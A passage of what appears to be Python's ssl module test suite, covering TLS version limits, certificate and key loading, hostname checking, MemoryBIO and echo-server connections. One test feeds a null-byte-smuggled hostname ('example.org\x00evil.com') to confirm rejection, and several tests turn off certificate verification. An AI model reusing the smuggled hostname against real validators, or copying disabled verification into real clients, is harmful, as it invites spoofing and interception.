ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.minimum_version = ssl.TLSVersion.TLSv1_1
ctx.maximum_version = ssl.TLSVersion.TLSv1_2
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.TLSv1_1
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1_2
)
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
ctx.maximum_version = ssl.TLSVersion.TLSv1
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1
)
ctx.maximum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.maximum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
self.assertIn(
ctx.maximum_version,
{ssl.TLSVersion.TLSv1, ssl.TLSVersion.SSLv3}
)
ctx.minimum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertIn(
ctx.minimum_version,
{ssl.TLSVersion.TLSv1_2, ssl.TLSVersion.TLSv1_3}
)
with self.assertRaises(ValueError):
ctx.minimum_version = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_1)
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
with self.assertRaises(ValueError):
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
with self.assertRaises(ValueError):
ctx.maximum_version = ssl.TLSVersion.TLSv1
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
@unittest.skipIf(IS_LIBRESSL, "LibreSSL doesn't support env vars")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
@unittest.skipIf(hasattr(sys, "gettotalrefcount"), "Debug build does not share environment between CRTs")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set CERT_REQUIRED
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# Changing verify_mode does not affect check_hostname
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# keep CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_custom_class(self):
class MySSLSocket(ssl.SSLSocket):
pass
class MySSLObject(ssl.SSLObject):
pass
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.sslsocket_class = MySSLSocket
ctx.sslobject_class = MySSLObject
with ctx.wrap_socket(socket.socket(), server_side=True) as sock:
self.assertIsInstance(sock, MySSLSocket)
obj = ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO())
self.assertIsInstance(obj, MySSLObject)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with socket.socket() as s:
s.bind(("127.0.0.1", 0))
s.listen()
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
def test_bad_server_hostname(self):
ctx = ssl.create_default_context()
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="")
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname=".example.org")
with self.assertRaises(TypeError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="example.org\x00evil.com")
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
class SSLObjectTests(unittest.TestCase):
def test_private_init(self):
bio = ssl.MemoryBIO()
with self.assertRaisesRegex(TypeError, "public constructor"):
ssl.SSLObject(bio, bio)
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
server = ThreadedEchoServer(SIGNED_CERTFILE)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
